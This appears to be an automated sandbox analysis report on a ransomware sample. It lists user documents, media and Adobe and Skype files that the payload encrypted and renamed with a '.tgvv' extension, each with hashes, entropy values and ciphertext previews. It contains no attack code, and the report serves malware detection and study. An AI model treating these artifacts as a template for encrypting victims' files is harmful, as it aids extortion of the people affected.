                                                                                                      Preview:VLZDG...e.M.a@....N...Ol.8p .MxnK.~.*~..t.].#k$a&.h..+......0..7.t.0..[....E.....c0YF..M....|`}7..`.3/*.D...l..`.hg....V`N..'ZEUv;...5*..@P.cjv.7..X>d..(...Pnih,P..c..H.K7.o..vI......_+.B.%Fmt.\.m,...&W(.....]..a......v.+-.vmX..F...5.C.....s..n...r.<.V 9rbj.~B^.^.:...Hh.G.....1b.)Y...[{=.G..^j...Cr..`..k(..g.4!..?z0.V.[Z.....1.&+...E.0...>Q.{wN...H..Mc<*..//}....O.$s......C.sYO.Q1.y.\S(...c.]..%.."..--.J.5......O../..m^..~..d..8g.....YXW.6>5./O....aD\..L..<3.".b.._k.f.Z......I.`...]'...[...E.f....s:....4..{..!gU^.pc..<&j...wR.q&5....$...1.a...[...7%h.........81.R.`{....<T...1.!r..&H....9..3]...?.@]..[......`....S..u.mpsd2.A.2.0.........k...+...............#..X..ZY. ....M..k.=o.>...).1.B_8.......{....pD..c0..B_6...P.7.{n...f..^.l.B..K............v...Q|X.3). n.......`.....@.1`.r..f."W.t+.P....6..;A....M../el:..2....9....._VJ.d..o.z...Y..1Ez.p...nt$?..+&..t.......*...*...?B......;x>.NO.W.. ...`..gJ9..;..7..Yk.P...Y...j...7....O1.Y..%

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\VLZDGUKUTZ.xlsx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.845157805087196
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+WW81Urw8s7tt7EU8PHQUzIZRgNF3fJ7OpnCPSPWhj1Qv6bD:q8608s7r7EpQUhNFPJ7OpApj1QwD
                                                                                                      MD5:1436BF8890C090566489D4272DE57309
                                                                                                      SHA1:903BA9DB9A95C5B62255E7C7C55B7F01A8A4EAE6
                                                                                                      SHA-256:0660E9A144C3667F1E11925B76C164AA52B6EF02130D33DD284C47BAA4CE5A9A
                                                                                                      SHA-512:48277BFA3F4B806978D411B70932C9F2F4085908DA5D2220B8BCEE655906BA30391FF99FF048DB9DBF3B1C7267A999A2DB0C33E1AB3AEF13E6DC828EEAF07943
                                                                                                      Malicious:false
                                                                                                      Preview:VLZDG=...x8N...I.q.....u2NC....>..F..kP..w2.B.).v4.....#v....55.\.50.L.o....|.M...a...}..ucs.....?M....S_....rk..W.....1.....rz..M.q...a...tZ..N...<.;....~1;]y.`.)......Uz....h^....<...>..(.a.. ...oD..BA...89..s.t.A.#.._........?.....o.h..:.U.^.^@.<* ."...+Dt..P<...(&2......G...y.0.<....[....O7...k[.y...58A......!H.)..b.=.......EXQ.{I..&yH.QT?W|..|Ac......dc;.j@.?ORb...t...z..~......."["I.]..5...|...56$|j...`...-l.R...F......'.~...,..].q....sO......4d NT..O..!.....D.....j</L...2m.ZE...t..\a..........m.....>.-0.EB....TF.z.p....|..s.....L.m....B}.K..-Yn.|..s.V..lj..#g.D.J.8..-*.^QF.:^.f..........4..I.....%...b....K....(...p@..B.R\.|...Yc.... .}.~Ly.L........8.......v.eG[k..RV.].D\l|.....3BO...mkAfR.Ps.\.#.+^i....3..>mSDD..97.a.9....._.X.8CNo....a..Fyg.Om.Y....B{......,.S...H...~.S.2t%.)r..f.AE1p'..\..sXbD.lwb..._.Qh..QP....}?..[.}@..F.!.2D..t......!ZG...._.>.t.r..(.-(..a.$3.s.a...'...-.e...!.-kL.L?..h~M=..4.i/5..?..[W.Q..L.S.B.u.\p..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\WDBWCPEFJW.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.848980063325005
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mmEHaX5PRhmS02T37FMGdtaS8s3I0nYX8x0TJB5NwwgeuETw0omDfs36YJhlnv6X:JsQ7ISTB5taKI0YuYqwBuyf/KVnwD
                                                                                                      MD5:80372CA984CB577C3F04AF1E3B814674
                                                                                                      SHA1:E1FC8983E9303F2D0AD31022A777F532D95C3E62
                                                                                                      SHA-256:A07FA91A0BEFF0CBDFB74C1D2AE2483184BCB88C5A349091067CD5C09CC0C57C
                                                                                                      SHA-512:3D333A6B62611646A3977ADE2375A737AA4C6FA8E9AAFB35CB810BD6B143D3BD0BF42483E59BDE5D12553EF4616668AFE2E3858941F2407E18543D28A2849F91
                                                                                                      Malicious:false
                                                                                                      Preview:WDBWC_..<u|....P...]S...:.<....7....(...y..%...:......4.._..<.gn].v......N..-..!\.b .&.}G3...l...l$..Bv.2...1...n}...!Q...Q..e......c,$...y.g....I......v.Lk.*g........V#*....`.n...;=.x9v...uH1F...1...U....it#.D..........h.`{..O8.[.\o..`eHb.A...`.hj..q..w8.T".&Zg..|;..A..M.g......UBN.[mg*...tM.YB.....<......6.R.I.Ar.......?.w.....Q.]}P.e...|n..7.".c.............[..Do..16L?.#SQ.I.5...dP.....u.<..{...7.t...,8...1....?....&.Ig.6.Vp&..HG.......*...Hs.....rf4..+l.RV...LO..,......h.%1.[.?..iq.vs....^.v,&...53M@..ZW.j....= '...r..........W&...[......0..f.G.q...f.yq.C.....8v'..._..1...3J.$..R....N..z..b.kd.08.hS.....0BYx`.^..A.33..V.NFB.l..b=j......}...(.....T...........s..1.'.....Z.....:...sq....Q+W}.........r..m5..(.3.."..SU.Pp...vu_v2.*..&RQ...e.|.'.L_..2.}.F.~..M.|p.h..+rbu[.oxTa.D..k]"..k.<..$.M;.`..R!K.....l..y.&]....N....n......|dO."p........S.....d..!.z.|.u.p..1..;hG".H5.*.,..T..R D-...2rs.....x.n.....h...{Y.'cD..g. .R...5..o.cP...$.t.^...St.@.

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\WGJEOYCVPR.mp3.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.846029046057823
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:nN9twH8IGjQtvN+G6/efm7GUWjW/OHFLhul9v7xsFt1DwuWRdywGv6bD:rtwcX01NCe1al9v7uFLDKLy/wD
                                                                                                      MD5:D6F53EF2C1CFFA62540741A1FEA1E1B3
                                                                                                      SHA1:EE884965FCF14D97A85AB9DE0647292140425A9F
                                                                                                      SHA-256:F0D2C20E28D2C9A8134BA32A213D512E6971F3C553B5420FE006D67496F07E72
                                                                                                      SHA-512:F1C67874EEE45F22425B8408AC87E907F3A0A06B0DCF34E28D936E5BF7FDE86646C523A7F9E296C42E2B66E133794BBE8EA91EAC4C95CB5188D7E73FDB0BCAE2
                                                                                                      Malicious:false
                                                                                                      Preview:WGJEO...;m...!..mY.#..DH..^..d(8.=4...:.;(.....b|...T....B...yN...'....p/.2.kz.w......<.]y.Kr..[].z......Sh|.O..q.R.......3.A..^B1.@.....px..."...=.y\....2=3Z@.v....S^...+f.......o...3.@..)a`..s.SU.....C..L..:2..{..N.{.*.l.'.......q.U.E.*.G.Ci`.~<...Nss..:...Q.k.6]."..".... 4.a.q..~n(..K8.OI.^.....g.T.b.@U.lcx...#..:./.h..?u..n...jO.....^s.d........2.6...)9;......pJ#..?.eo.....SY....$Y"bM.{.D..b.c.....I.......g..j.v`.q../(.hE.YK..Cac....l.4+.N$...Ri.6,..a..z. .l.w.XQ\.<..J...D..h.k.fY.V.....T...%..1..Q6b=I.*....(n...@.p+.%U.G..(P9y:a@...E0:1"|.%.....&.^%].R.g.....:$.7...k....9.....y....I...l~.."R.G.UN$....o`.....]...j6..#.1%.&..ZN...KJ...v<.........dB.....y..i...B..........?V..1^sXD..`n.......?G...gkl.{..+Q-..&..T...1....4."..X[AF+...[qD{...4T..u.D..x.....aJt.HJ....ar.u.k3j..LjZY..#.k..0S.g0.^...J.....!....t..Z/.LA.0....m..q....Zj.Paj..x..'.Y....q*$..^.0....,.!.~.(!...r...&S!...y.8...k..1O..l..(v..:....^yA.C6<..q.......-.Z7.B.&. .Y..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\XZXHAVGRAG.docx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.828106004507467
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ezy8W5c75I5jpsboXc2f3Mv5zkCylnDkhB4oiEZogTnm/rUn1/t3LvaJv6bD:ek5cFOjdXukjJD+pNlm/rK11LvaJwD
                                                                                                      MD5:2038D20995442E090E7249B9FE53D20C
                                                                                                      SHA1:8128E3936643B8246CA9DE6BBF1913A80FF53183
                                                                                                      SHA-256:7FFA2F6442051D27B8849A666FD242762493547CB1385653FC9D8CB0F404924E
                                                                                                      SHA-512:3D07F0DFFD493DED6D5DE263B0D9ABE7BEA7F5BD218C63D270DD214752387BD08F3BE951C8DB934ACC35614E4C17628736490810D2FA62F9C110C0A8F3B53F8C
                                                                                                      Malicious:false
                                                                                                      Preview:XZXHA............Y.g..N0.qmS..._Y.~..y..H...-....@.:1>...Y .....#...........?i..d.c.?m.s6...1.[.....l~9..,.+..G1...S.I.k.....z;8..f.|..|.f|.wp...T/D..9.p...$c@7...k..d7......%P...h..5'y..q..7..q.....s. .G8al.&.A....=.M......".!.y..Vf.G..H..m.ih3-..'....:H.....R.Y.....W.8..Z.N/...B..en...n...J../...9....X..&v....%....4.....W..X..(...(>...4....z...^0....t.aYBG.............-.W.!z\.%]...n..M.J.Hi..qM}..0.D .J..........N.9.s........7.Yl..$AV.5]k+i(K7....%...5...^H..b.]E%.Q...17......5.. mf~.0..#...>.!.g".%*..d.e...S..%.k....!.v..d..#..2......l...Re)..-.....P...8...dC..!.....1.5.{b.7.;).:=_..u&.%. "...<...{..Vy.0q......q..9.4.y..e...Z.......P...%.(%:...;#..k.M..!P3c!.q....$..kT%2.A.Su.;].pv.A`.z..W..s/p.K.b..J..w..Z....K../.>4..........x.}...;..N,VL.q`7...?..:.].:M...N]Q<.....0.1p...WF..?.#2.!FA.1!.E..$. QW..~e.wt+f..B.w(._..6%........}......U...M=z.5.xl. a.M_).;./.Q.........#I;U.;1.B.[......G.....MG..n.z.5.1....5FfW.4.w.{..*..@G,......."........

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\XZXHAVGRAG.jpg.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.859231147357393
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:lqdY+E5bP/r81DLJMaOTCGC1sqlHEQpAUmm60tkCsB/DecEk5ROewsYZf+5ghvRs:ULE5YIlCFZE+mnV/Ek5czaUpwD
                                                                                                      MD5:384E45E4987F3AE2A5BE189258B4A719
                                                                                                      SHA1:A4AF7104FF4EC296DF9BB57A80F8F802F11407F1
                                                                                                      SHA-256:BE54A7E709C73E2DB9D86A9FCABBFB399370C6065B2F12DE436A24B798895D08
                                                                                                      SHA-512:9B10CEF78D54BC868B105CC5CBB04EA6DE0507F60BE66500B5244D23D57FFFF0E2B705240CFB2C5DB070CB11BD779F4BDC9F6D76753C32197404233C086C4E15
                                                                                                      Malicious:false
                                                                                                      Preview:XZXHA...../$.L.F.*.Jy.K.u.!.9....3..".)....O,....'.u.5....[#..tj.8)....].j.V.k.}3>y.K.F....o..SlxVp.......z.}...d.p..../V#.]X......f\f.....(...mH.....U..._KIZyo.t]....L:..7s.....7t....}.R.w"P..R.. ..[.K....e.yY..V.,.O..5..Z.)./.R...gD....$vn.b.|Ik%....My...S...n............A.D*...:.B-.T..*.<..y.o.....R...._..d..y.vhC%..N...uU...w...u)..m..t!.U....%J.t...z..q......Q...dU...f............_F#.'1ne^...'..3....qh...O....~).o.T. |(=.4..e.>.A.Y...Q.S.^.@8.p.....(ggB.x.p..0:.V...X.M)Pf.i...(.....m...a....O.>.gDZ...-N.....^sg_..F<M..........bP..=..0..p6...e..Dm....0Lp.U5.......q....z..o..v.b.P>`.'.E...t..q..5..3.>..5....QM6..M...1.^...K.:..7$y.G.....c0...q..}....7.~.*..2R.d."..]..5...:.......clh. ....5....h.fL..u.9...VD..@.4...==...._..P........L.o.9K..&f(.v.<D.z.e.Ar.....:...H./B..wMIS.Rs=.:..U......s.Kl.rq...^.[0S``K.O.s.J.l.#.....Y.(.I...v.[tu.r\.#...&.n!5./.......^..t......P_'w5..-j*.....5..+.n7v..}..4...a......`n\.:.....o..k.....j.&`../k$D......s..$..f

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\XZXHAVGRAG.xlsx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.839126884610047
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mZ3jxhz9xW9dRW/BJ8+YI2eSenYsBjA25us+C7bxCrQTkt/tBv6bD:m7hW9dR6J8+12e/G27+C7bMQTMbwD
                                                                                                      MD5:EAF0C58D5A54949644ADF506FE7B0EB8
                                                                                                      SHA1:94192CD08079D952F285D5C8B087B6653E2790DC
                                                                                                      SHA-256:7562D157E6E6FB40576B3B66B2746A5F8F42712F48D49667B70171FE836BA88B
                                                                                                      SHA-512:D4A54D57110DC76425F7B9239BAEBC0DCC8EBF8674D32BD654AF44410994B602397637622D7D8F4177E6BB862D681DD3A91D76566AFD1424576AA9774042C9DE
                                                                                                      Malicious:false
                                                                                                      Preview:XZXHA...:<.n&.C........'...~.U.!T..".;.q..y.....d`r..5........J....l.w..C..%.I*..D.....).....t..ET.......^p.P..u.....|...N..[1..-J..7..:..+....5#.$h.T..}.......[@.~..:Z...YQ..W.:.i....&.....L..*...'%$........~......k.U!.q..0g.S7.....n@?.........E ...[..B~...e...f.Vpc..0.F.g...........X....g...1T;aL...:..._.A..7..Qu..0%.W{+F.........H..L...t.5..a....hQ..jy.".....*..........C..G..&{..1..S..f.-.G..FgCc1...H.%#Nph1_._gad.7.<,p.|...S.4nd....^?.t.....Y1".c/.W......+..^~.{.BP.t.v.s....n.r.H...i.UC*.+<.R..Zd.SKJh.$........+d..K(.H[.S..~v.X.....df......U...{.Yy...^.f7.n(.z>.q....F........0W....p..1. '....#.......V..o0.yx..........('p......0.t..{...~V.d...#..`.F..x.Z|.......f..z.e..%...3.R............o.1OS9.z...PF..)..Yw..L{.g.zD......f........oE#f.4T..k~.......>.mp\.z...y...(...3......./...k.:.5Cp-..C....o.q....3^.4_.*+X^).!p..v.z.!.U@....?V..v.y0..e..{..........F.....1Q'.......hf?..ZN..&.....=...V..1....X.L.n^...j:3....a6c:.m....7...E.T.C.u..,..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\ZTGJILHXQB.mp3.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.861444757656594
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:8nYC4q4Y+MjSgmXKzb7Fndx45TW66Wf2UaNvnrNo1nu370URpy9q5GzyunfDv6bD:CUYRSLXKH7ST3JGRCu370URpy9qYzyuQ
                                                                                                      MD5:93F66E9F1CDC92C54741DC994A949587
                                                                                                      SHA1:E00DAEE98B06D1A695E1242E2A3F6208F7D90C9E
                                                                                                      SHA-256:B93E9FC96EC3A5E7BEC23268334042B3276D8D8E123AFFF99C5A8316E708AEA0
                                                                                                      SHA-512:BC74FB813C1B794CD9511A0ACD979CA024837EF3512071EF8D1FE618A2BBBAA140AB8250627EF47FE92E3F20E86131BABEDF8CB4FDFB16E60B84D59CA3648F50
                                                                                                      Malicious:false
                                                                                                      Preview:ZTGJIU9.b.2.3....9Q....v._tI#JP..]9|.C.~.s..cy...U....=..d..$....0d......Kv....y(H.8&D..l.0.....x+..4.t..I..G.?.x.=......7.....8.f..k......E.....9=..r......&..Q...g..Y.v.|&${.L.|k.K...x4V...."=...Xo..ar.(..b.....Ok^q..<m4......b..........w-.O.....$j.iF.4Oo2.LX.t.......<^C..4%h.x.ON(k.r!Efk.'..o.h..*..a..u^^+....A.hc....o..;..x...{^.W.s.S...O-L"%...&C..iMR.j.X....2r.I.Y....,.....+.-....-..D/j.#....;.G...".......m......r.34.x.'S......d....B`.[...r"H.1z....R....y.G.....2.u.i..Jv.....sV......7t.f^..y.1~6...)I.i..Z\...(...S......!.F.4f...N...sy.h...r.&...E..........W.......r.a,Pn..Z..<X.e...62.......I.{v$.;..6....I^..5.n...=."..~Fj3Z.F.`m..n. G.p..."...P>...,<J..._.,..5..I..]..VTY......*..O..q-i.Ij.k..s..U.i2.....VC.`.J....o.K+..R......$`$....Q]X:sw.V........7-.\.0..!.80.5M....WM.RB.....{B.M}..M."..+.&.G.G.....G..<?.4.....|.....q...Gx.Iy.t.:.P..'Z>n..|e%J......]...V.".#......Y)?.`.<.7:....e~f.G..{mQz....R.....v.7.`.v.a5^U.D-.."....~g.r.q..

                                                                                                      C:\Users\user\Application Data\Skype\RootTools\roottools.conf.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):410
                                                                                                      Entropy (8bit):7.406134172024873
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:6U/zQBQoSJprcchu98pg+Q5aWJglNqeUd3wluw9vdrfA8Oa9hgqz+pnRNzXXvV9Q:6UiQoSnr823EZwbNdDAfIV2rzv6cii9a
                                                                                                      MD5:C812ADBD4F0302BD4322BDF7C70BA664
                                                                                                      SHA1:068F6EEAAE9FD0379EB886FF90BE77615FA138F0
                                                                                                      SHA-256:706160558A955D26B4BFECB6AD3411908CA329E8EF456D2DD01D187FB9786890
                                                                                                      SHA-512:07BC18FF78491DD03869B9EE4ACD79B865B46233E2BCC8D459AE8E12696966E72C8CBB2FD1B3513AE275C559D63120E0B47BEB8CD893C7A62B1D06BBFCFAB97C
                                                                                                      Malicious:false
                                                                                                      Preview:node_y..f...1.5....8..o.....1.wW..L....j.N.+Y4..P..b9...Q..es.3=Q/X..h.6..s.`...d....,...8.<.?........`..f....!...@.]8Z....0.........9..Y....J.9.!}...x._.)...w.....(.G.Ex.oa.1.-.!.x...R.RZ...v..0...Q........b,.:....B<".....E-.c:..s. .F>`...\.#..d..9...<wk....%t..sg..t.f.#.s...O.Z..f.-2n..S.....L..JLSD....lhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\Local Settings\1fb2b8ba-1097-4a46-9df3-e5e560b642f9\build3.exe.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1193
                                                                                                      Entropy (8bit):7.8424576170174145
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:BEeGL+z/QujxuQF90UtsG14/irs5m6dUmRG0w7DRKdnudcLLc3+cKhHs1MuxLv6X:2etzDuEV1eirom6drTWEddLcmhs1NxLs
                                                                                                      MD5:03825F79AE81CBF16BE4D3DEC753D98D
                                                                                                      SHA1:A3328F28539EB980FF5C961E8A2E0ED52CD79486
                                                                                                      SHA-256:C18192D3173B524C8F2DC08B418C00F2181527A5500970034517BA9CBEA93D75
                                                                                                      SHA-512:8892CC1E4A650C69BC42A24EBCC1A6F87143DF16D03F400642BEFAB3B84949FED9FA2D0B5145B09863112669C02AC612A69CBE44AC88312FA0BB6FF44BAFF58A
                                                                                                      Malicious:false
                                                                                                      Preview:<!doc.+..\Q./q.11..WN..3.%...o.~.JU&.c.V...s.AQD..t........|/.{...j.....~f.8v.9..ZPz.L..R..dj.T.+.|....[Kx&.s.kP..uY.........Y.U..f.V...9S.28T.M,.......@VGK<+......"D.>....+.......!?.=DIQqe6.m.L......!.Z..+..y.d..E..6..,.Sw-{W.}...@Q.*gC.....|w.\O.J.6...D.....-.Ah..g.....].k....p(..W......<1.as. .7..34.......o.......@r>..}....%......j.-...e.2.K5..1..)...)......a...[.OI.t....m....Va...#...;.....uLozU..WN.....%.!..V......ltf[...r._[....,l..z[y...t0&..L.......d..YM..(...dM9.....m(.z.[......(.5..v....s:..[3.:E.{.k8<..I.+..9.s.*..|H.b.&.1p....$.I.0.......K....{D.27$.m<X.|..]..GH..;M.wfA..b%.$.{...".)....SK@....3z..Bu....c~..........J...". ..X......Y...U.DC*.^Y......J....#f...z.`Z.j..'.T.&.Z...........L...v.lv..M9.(.Q.......2f...!.OI.?.Ox...G..iG........fi..?1...w.z#.3....6}...P_.K.#Sr%.{..@....d....n. .....K(cv..B...2...>:O.vv#sZ.hy.Q.......>!.O.#.F.......)Ve)........8..3S:.lQ..&zC....Ig.uK.a*.|.$.hb.d..%...!..0.1.u......DLB.)`....

                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt23.lst.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:PostScript document text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1567
                                                                                                      Entropy (8bit):7.876941381570979
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:8AzhZKoAV9BhmYUuH/akpGl/pybED1awD:XXsV9BkQY4bW1P
                                                                                                      MD5:AA94B48CEA589E16CFA7F58A162C7049
                                                                                                      SHA1:664021F9FCD3EC0AB6281A557BDFC50DE57D308D
                                                                                                      SHA-256:BEB9181DBE5A8AA2BA7814E42D20C7F9B433EE94AFC2348D8C67A4F12DA246CB
                                                                                                      SHA-512:9B956FDA7598E36DE2C4798A906D86B29BA93349DDDD755C8A54BBBAFCD28C052BE624FAB8256B8627A73502A76315AEF49876E4C8D31D3DA10D36E3A59F234A
                                                                                                      Malicious:false
                                                                                                      Preview:%!AdoP..fy6..[.l.......$c.....z...........2.h.>..nW..*..=.L.2.o)..38Q.8.:..CXo.L[.P....W...d..>.H.?....J.m......^"..paM.....,...yx..jE...@......E...'..m..N.?M..o........1.....M.......y.S...........VXJ. =..~:7%......L%.8...*..h7.6.R.s.]i.]....4c.0...d...[.M......$..H.#.dh.T...~..F{fI.....7..K..LZ.}.]Pj.)......L....*......:...wA..n... ...F.....8.(u..9|.lJ...:.G."*6.E..r..s..8....Q.....lm.8..7.]..pU...eP..O. .?+...@..z..j..cC.P.{._=.U.~........qq.....W....J<.h.Z.3..K.Cx'.....j`.T..*..{.[.x#.-Wbn.>D..I~*...F.(.R..a.!....NP...QG.X..7.....z^..lpN...#.M..W....|W......iU..W.%O!vU...n.$....hn....Z!^8...d...6....!J..g2...8W .Y.Nba..v+..sW....nf3..R-.:.,...).....p..w.lzt..s...?o.'..?Bj8..<K&.m..c...#'2.eK..;.{.......i9.+.R=#...e..v.....M...o.....NX..>df.<.g-c..<.B%.Q.......0...G]..<...t.N;n.........eW}..-N'..4m3..W.".J.N..-....V.L..8*.#...p......X.t...Vt.c.C.Y.C..._......E.....*.?.#/...Y.<I.B]..j..p....Q.a.i....i.L.2.+.lZ...\.CG.".@l.

                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt23.lst.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:PostScript document text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):185433
                                                                                                      Entropy (8bit):7.87502217214286
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:RkJ8jK45PIXmZK7OfdedUoSalwx62Jf8ckh67e03nef+vwQ89IvIW/EXE07Zman9:ko5PIXqldea/kwx62FahKe5Q89yDEXE6
                                                                                                      MD5:E71EA89DCB65B595C721B1884CEB26E5
                                                                                                      SHA1:A5FF98F7B59C6994E36D5EB47CDEF083D87506D3
                                                                                                      SHA-256:71CD8ED70DE88B253433859F0DADF48C07FAE111597CE7CEE8D3B133D707453B
                                                                                                      SHA-512:62B81140EA2023D5BB9B7EBD69AF45A33EE86E666D4A079D2BB0EA9BE97DA920ED032D34AACB7539820925E48C1EB446FA12C71D636B6BC1C7F56F6E67B56A75
                                                                                                      Malicious:false
                                                                                                      Preview:%!Ado..f..,..Q...._.`....O11...6..........3.....Hj.."T..4.Ey|b..Hc...5....,..h/.......l.V..rVu........&.>......!..3E.7...!V9..{Fi..@..Q.3.zw|.r.<.j...Z....(_*.k....f.v.LFrp......K?w`Tu...Zhd.....s?...I<.\pe..#.\.....H......#..)....!eA ......k.ew....>.yD._.....Z$m.t..).M~<Yuu...D.fn...Di.Q.F.'.{T...^.]...Q9.$.4.V.y.}GI..\....F.[...3U...DN7..j.xS..|].c...ZF&kt...l...........]..9>u~. .e.....Q.(.c..m.......D`.?.G.....%..zWB ...Mwl......?C.]\V.}sd.. .2.D..s...^GsNk..f.J.0...sC..?O.>..D..^.Z....yj..s|.....%...1....A..T.].$..i.`....rE.:.X`.s.=....;/.3..x..........:G.x...r.........1..0.8g...#...n(...M<.....Z..t.&.Zx.5.l.d.....|.x.s...CB....S,2.v%.~..%.h.VJh.+......'P..0.8.:.!.YV.{:.wq..?...4.>..s..Hp.. ;uJ.\.e*0.Vw....>.....}.~N/P...s.T}.0f....)J..Q......0o%.J..".....`...Cx......._....I..l....g.-...v..x..s.f..*.}.....0....39.b........NG.....N......N..c..(..^.X.....w*.B..l=.(........fc...g.s}.".&p..{a..\....n.l.3..<UUg.o.v.t.i.['.

                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\IconCacheAcro65536.dat.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):243530
                                                                                                      Entropy (8bit):6.819366919246551
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:ED7tNuX2/y2zYrD7n2LpgF9NGYLFGGhEvyHNan1TMiJ5BFOolNln8:ELuX76YX7nU6coFmCaPPNn8
                                                                                                      MD5:90ECC6EA965A5578E31D62228AAC6496
                                                                                                      SHA1:2154E84DF7FA0E15E79358D85FE881ADCE0AACAC
                                                                                                      SHA-256:AB36FCCCFD2610F025478AE617A168FA39AFA49C49B7C1D7E0E3F646A56209DE
                                                                                                      SHA-512:4BD7AE83CB3E3694D8042A95355C8C17AB41C3DD43C705DA626902D19D77A5F866C1850601A3E25D7EA099EEE2EE73F1FE054B0BCF4C754DDD73825985CF0AA7
                                                                                                      Malicious:false
                                                                                                      Preview:Adobe....~.....P.H..'$..f...n..HW...D....as<....#...xS...M...p.t1._......Z.-/....~3.*..[..m...aq.ZqV.L......W)0|.j;...\...m5.p.mN.6.'.`;R.,..~G.f.xi..'i.z.;.R...dv6...]!.......s@..g....P*/.C...Q.e.D.". ..u....._l..p.......H ..Q7]..)..l"x....B.?......YQ&.s.3.G.4.I..*..._..<@,.t#$..^'..g...y....N....z...a.....a.3%....2.>..R..B'Lk-oj....Ds..msz+.....,-;.....61.D..T1..$.,.^..\....6.K..G...]4.!hX...F.8l.-n.V.....>.......b....).IP-W}.K.$.M..i.b...m....e>.u..d.y.....Q..f{.bb..?....).l.in..m..y..zT.4......v.x..wm..mK........j6.#.~.m..~..5_.6.P.'\..C.(.=.E.>.t...op.,V.....?....^.~. .x%_SU].j..^.A .WAB...6.f.....UP.+&.`..i.'NCrd.....-....>..q%.....iD.."....Mk.r..G..8......zP..u.A..J.yu.a....|G.*bw..(..<.b..F..k..KP.o..#e.'7.......|.Dy.}..\O..V.xh.}..e.=........|...UY.8...8..5.....\`_.w~.U.y[j..9;..SF/TqW..S.._C..`............V..;..."s3T....q..I.m.j...K(~|.{....>~wM..s.1.a.p.Q..._ >.?...._Bi..!....-..&..SJ...E.T$...s.....F?V.%......*....r.QGH..-...2.lr

                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.tgvv (copy)

                                                                                                      Download File
